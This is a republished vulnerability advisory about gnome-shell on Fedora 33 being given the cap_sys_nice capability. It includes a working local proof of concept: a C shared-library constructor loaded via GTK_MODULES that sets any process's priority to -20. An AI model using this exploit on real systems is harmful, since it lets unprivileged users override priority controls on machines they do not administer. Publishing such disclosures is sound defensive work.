Fedora / Gnome fscaps Issue

2021.06.24
Credit: Tavis Ormandy
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

fedora: gnome not using fscaps safely I happened to notice a minor issue while working a tool I'm writing, I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice: $ rpm -qf /bin/gnome-shell gnome-shell-3.38.4-1.fc33.x86_64 $ getcap /bin/gnome-shell /bin/gnome-shell cap_sys_nice=ep This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0: $ ps -heo nice -q 495980 0 I don't have permission to raise that: $ renice -n -20 495980 renice: failed to set priority for 495980 (process ID): Permission denied But it doesn't matter, I can just make gnome do it: $ cat prio.c #include <unistd.h> #include <sys/time.h> #include <sys/resource.h> void __attribute__((constructor)) init() { setpriority(PRIO_PROCESS, 495980, -20); _exit(0); } $ gcc -fPIC -shared -o prio.so prio.c $ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes And if I look at the priority now... $ ps -heo nice -q 495980 -20 This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is YYYY-MM-DD. Disclosure at an earlier date is possible if agreed upon by all parties. Found by: taviso@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top